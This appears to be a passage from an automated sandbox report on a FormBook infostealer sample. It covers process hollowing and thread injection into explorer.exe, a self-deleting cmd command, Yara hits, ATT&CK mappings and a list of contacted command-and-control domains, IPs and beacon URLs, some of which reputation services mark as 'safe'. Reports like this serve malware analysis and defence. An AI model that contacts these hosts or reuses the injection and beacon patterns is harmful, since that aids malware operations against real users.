          Source: C:\Windows\explorer.exeDomain query: www.tecquestrian.com
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.76.166 80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.4.135.136 80
          Source: C:\Windows\explorer.exeDomain query: www.cuntrera.com
          Source: C:\Windows\explorer.exeDomain query: www.rogersbeefarm.com
          Source: C:\Windows\explorer.exeDomain query: www.rainboxs.com
          Source: C:\Windows\explorer.exeDomain query: www.safegrinder.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.nowhealthdays.com
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80
          Source: C:\Windows\explorer.exeNetwork Connect: 209.222.96.146 80
          Source: C:\Windows\explorer.exeDomain query: www.nobleandmarble.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeSection loaded: unknown target: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 11C0000
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: explorer.exe, 00000004.00000002.906939906.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.655879856.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.908444659.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000002.919431085.0000000005E50000.00000004.00000001.sdmp, wlanext.exe, 00000007.00000002.908444659.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.655879856.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.908444659.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.655879856.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.908444659.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.673301906.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionAccess Token Manipulation1Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery231Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection512Access Token Manipulation1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 412599 Sample: 1cec9342_by_Libranalysis Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 31 www.changethecompany.net 2->31 33 www.blissfulyogamullicahill.com 2->33 35 changethecompany.net 2->35 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Multi AV Scanner detection for dropped file 2->47 49 4 other signatures 2->49 11 1cec9342_by_Libranalysis.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\8t7v9o92aq2mtu.dll, PE32 11->29 dropped 59 Detected unpacking (changes PE section rights) 11->59 61 Maps a DLL or memory area into another process 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 15 1cec9342_by_Libranalysis.exe 11->15         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 37 directflence.com 185.4.135.136, 49764, 80 TOPHOSTGR Greece 18->37 39 nobleandmarble.com 209.222.96.146, 49767, 80 RELIABLESITEUS United States 18->39 41 20 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 wlanext.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          1cec9342_by_Libranalysis.exe54%VirustotalBrowse
          1cec9342_by_Libranalysis.exe24%MetadefenderBrowse
          1cec9342_by_Libranalysis.exe83%ReversingLabsWin32.Trojan.FormBook
          1cec9342_by_Libranalysis.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll26%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll59%ReversingLabsWin32.Trojan.Spynoon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.wlanext.exe.3d17960.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.1cec9342_by_Libranalysis.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.0.1cec9342_by_Libranalysis.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.1cec9342_by_Libranalysis.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.wlanext.exe.354df80.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          rogersbeefarm.com0%VirustotalBrowse
          www.blissfulyogamullicahill.com0%VirustotalBrowse
          tecquestrian.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.cuntrera.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=oJz4pJjdv4YVSt0+MmS2FtCA6v4cV0g87aIryYx21PY21L+ds7v/9rK+HMpewy0ytB7Z0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.rogersbeefarm.com/or4i/?HFQDEL_8=iur2w+iIhsR226mwIbytM77gwZtRr9g6xSmsh16YEl1oNNyvhmb6qr2bTjtOXqdr6kbB&4h_HCv=a2JDa0Xx22IpWxjP0%Avira URL Cloudsafe
          http://www.safegrinder.com/or4i/?HFQDEL_8=bE8h/5YlyIaGfqFoj5Gnx56lPI3pmXv2ej3H/Ly1qjs4t+LIMarOZaaU3+bG1fp/+sg3&4h_HCv=a2JDa0Xx22IpWxjP0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.healshameyoga.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=br7cblkv9ontd/SiGgT+XZDl5pRbJS2ewUI6yLIzIbkbVffvtcdgNY0Hgbt3ntXhEXSG0%Avira URL Cloudsafe
          http://www.directflence.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx0%Avira URL Cloudsafe
          http://www.tecquestrian.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=1XIvg6XU5vVZMvk0S+FgKHUoBBBn1K6+BdhisE+/5jtYq3yTMpA8lYHSBxv+eIZJV1A/0%Avira URL Cloudsafe
          http://www.nowhealthdays.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=Nfl9li5qPifS0qmI3oGyYt+1WQBc6+s+CWT3m3ZkN/MuRx1xa905Jr26QEss+PYMzBmi0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.changethecompany.net/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=s0IAE6utMOpEbBTXfVBtMvohtOMhwSGLvfPwlSEa+yA+XVzrnw8OQ7eif0DqkxnFDccR0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.nobleandmarble.com/or4i/?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&4h_HCv=a2JDa0Xx22IpWxjP0%Avira URL Cloudsafe
          http://www.booweats.com/or4i/?HFQDEL_8=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QI8r/8KBX8&4h_HCv=a2JDa0Xx22IpWxjP0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.mmgenius.com/or4i/?HFQDEL_8=kdp3FbqcdOoi47L6CSewezhnIrd3vGjo7ZesdbmmEgh4+nsMxNwHdMyhwqYehAYq5sNV&4h_HCv=a2JDa0Xx22IpWxjP0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.ikeberto.com/or4i/?HFQDEL_8=9uknvSs0D9sRUbKPNEJc//q5kM+rT7HBD1bOe0TigX7EwC/pCwMCwQN4ECUA0466XB/p&4h_HCv=a2JDa0Xx22IpWxjP0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.rainboxs.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=+ijMlDuYhuzidrLjkbi+elVKZ7K6phzLRhFwzYI2MHaYrqu+hiZ6wsf57yroxB2MR5WJ0%Avira URL Cloudsafe
          www.nobleandmarble.com/or4i/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          nowhealthdays.com
          		198.54.114.164
          		truetrue
            		unknown
            rogersbeefarm.com
            		34.102.136.180
            		truefalseunknown
            www.blissfulyogamullicahill.com
            		199.59.242.153
            		truefalseunknown
            tecquestrian.com
            		34.102.136.180
            		truefalseunknown
            www.booweats.com
            		64.190.62.111
            		truetrue
              		unknown
              shops.myshopify.com
              		23.227.38.74
              		truetrue
                		unknown
                rainboxs.com
                		34.102.136.180
                		truefalse
                  		unknown
                  www.cuntrera.com
                  		154.93.81.33
                  		truetrue
                    		unknown
                    changethecompany.net
                    		34.102.136.180
                    		truefalse
                      		unknown
                      prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
                      		3.16.197.4
                      		truefalse
                        		high
                        nobleandmarble.com
                        		209.222.96.146
                        		truetrue
                          		unknown
                          directflence.com
                          		185.4.135.136
                          		truetrue
                            		unknown
                            ikeberto.com
                            		34.102.136.180
                            		truefalse
                              		unknown
                              pixie.porkbun.com
                              		44.227.76.166
                              		truefalse
                                		high
                                www.healshameyoga.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.ikeberto.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.mmgenius.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.directflence.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.tecquestrian.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.rogersbeefarm.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.changethecompany.net
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.rainboxs.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.safegrinder.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.nowhealthdays.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.nobleandmarble.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.cuntrera.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=oJz4pJjdv4YVSt0+MmS2FtCA6v4cV0g87aIryYx21PY21L+ds7v/9rK+HMpewy0ytB7Ztrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.rogersbeefarm.com/or4i/?HFQDEL_8=iur2w+iIhsR226mwIbytM77gwZtRr9g6xSmsh16YEl1oNNyvhmb6qr2bTjtOXqdr6kbB&4h_HCv=a2JDa0Xx22IpWxjPfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.safegrinder.com/or4i/?HFQDEL_8=bE8h/5YlyIaGfqFoj5Gnx56lPI3pmXv2ej3H/Ly1qjs4t+LIMarOZaaU3+bG1fp/+sg3&4h_HCv=a2JDa0Xx22IpWxjPtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.healshameyoga.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=br7cblkv9ontd/SiGgT+XZDl5pRbJS2ewUI6yLIzIbkbVffvtcdgNY0Hgbt3ntXhEXSGtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.directflence.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kxtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tecquestrian.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=1XIvg6XU5vVZMvk0S+FgKHUoBBBn1K6+BdhisE+/5jtYq3yTMpA8lYHSBxv+eIZJV1A/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.nowhealthdays.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=Nfl9li5qPifS0qmI3oGyYt+1WQBc6+s+CWT3m3ZkN/MuRx1xa905Jr26QEss+PYMzBmitrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.changethecompany.net/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=s0IAE6utMOpEbBTXfVBtMvohtOMhwSGLvfPwlSEa+yA+XVzrnw8OQ7eif0DqkxnFDccRfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.nobleandmarble.com/or4i/?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&4h_HCv=a2JDa0Xx22IpWxjPtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.booweats.com/or4i/?HFQDEL_8=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QI8r/8KBX8&4h_HCv=a2JDa0Xx22IpWxjPtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.mmgenius.com/or4i/?HFQDEL_8=kdp3FbqcdOoi47L6CSewezhnIrd3vGjo7ZesdbmmEgh4+nsMxNwHdMyhwqYehAYq5sNV&4h_HCv=a2JDa0Xx22IpWxjPtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ikeberto.com/or4i/?HFQDEL_8=9uknvSs0D9sRUbKPNEJc//q5kM+rT7HBD1bOe0TigX7EwC/pCwMCwQN4ECUA0466XB/p&4h_HCv=a2JDa0Xx22IpWxjPfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.rainboxs.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=+ijMlDuYhuzidrLjkbi+elVKZ7K6phzLRhFwzYI2MHaYrqu+hiZ6wsf57yroxB2MR5WJfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      www.nobleandmarble.com/or4i/true
                                                      • Avira URL Cloud: safe
                                                      		low

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.comexplorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                                		high
                                                                https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_landewlanext.exe, 00000007.00000002.908237231.0000000003E92000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.tiro.comexplorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://nsis.sf.net/NSIS_ErrorError1cec9342_by_Libranalysis.exefalse
                                                                      		high
                                                                      http://www.goodfont.co.krexplorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.carterandcone.comlexplorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.typography.netDexplorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://fontfabrik.comexplorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpfalse
                                                                          		high
                                                                          http://nsis.sf.net/NSIS_Error1cec9342_by_Libranalysis.exefalse
                                                                            		high
                                                                            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referwlanext.exe, 00000007.00000002.908237231.0000000003E92000.00000004.00000001.sdmpfalse
                                                                              		high
